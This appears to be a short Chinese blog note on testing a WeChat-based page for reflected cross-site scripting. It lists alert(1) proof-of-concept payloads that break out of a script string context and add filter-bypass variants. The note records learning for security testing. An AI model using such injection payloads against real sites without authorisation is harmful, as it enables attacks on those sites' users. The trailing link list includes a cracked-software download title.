跨站脚本攻击(反射型xss)笔记(一)
2024-09-01 03:26:52
环境:一个微信端(所以用浏览器演示UI有点变形)
下图是未插任何脚本时的原页面。
按惯例,上一波【"><script>alert(1)</script>】
无弹窗,看下源代码,尖括号被过滤掉一半!?
试了半天,尖括号还是无法绕开。。
payload: 【 ';})</script><script>alert(1)</script> 】
突然发现,好像哪里不对……明明在script下,我居然还要跳出去另一个script?傻了傻了,直接在script里运行不就行了……
payload:【 ';alert(1)// 】搞定
payload:【 '%2balert(1)%2b' 】
后面发现,减号也可以?!什么鬼?!
感谢表哥的文章指导减号payload
https://bbs.ichunqiu.com/thread-31886-1-1.html
最新文章
- Ubuntu Server 14.04 集成
- Legacy Notes网络和服务端配置的笔记
- SharePoint 2013 Error - TypeError: Unable to get property &#39;replace&#39; of undefined or null reference
- 13款经典BI项目报表&;界面风格设计方案
- HDU 1425 sort(堆排序/快排/最大堆/最小堆)
- Python学习路程day12
- Android开发的进阶之路
- c语言排序算法总结
- 开源PaaS产品介绍
- Google Code Jam 2014 Qualification 题解
- 南阳理工ACM-OJ 分数加减法 最大公约数的使用
- Struts2框架学习(三) 数据处理
- 初学Python之 安装包的抉择~~
- 请小心使用 ng-repeat 中的 $index
- linux目录2
- 查看当前Jquery版本
- Mybatis学习(二)————— 全局配置文件详解
- 第9章 Java中的线程池 第10章 Exector框架
- JFinal提示:java.lang.RuntimeException: dao 只允许调用查询方法
- cygwin如何下编译安装tmux?
热门文章
- 微信小程序把玩(十一)icon组件
- Android零基础入门第12节:熟悉Android Studio界面,开始装逼卖萌
- UWP访问KnownFolders.RemovableDevices时(读取U盘文件)抛出异常UnauthorizedAccessException
- spring bean 加载过程(spring)
- 前端开发在手机UC浏览器上遇到的坑
- SYN6101型 RS485子钟
- Paragon NTFS for Mac 15.5.53 中文破解版(激活码)下载
- 【记录】mybatis中获取常量类中数据
- 【nginx】反向代理
- 为什么string是引用类型 值还不可以修改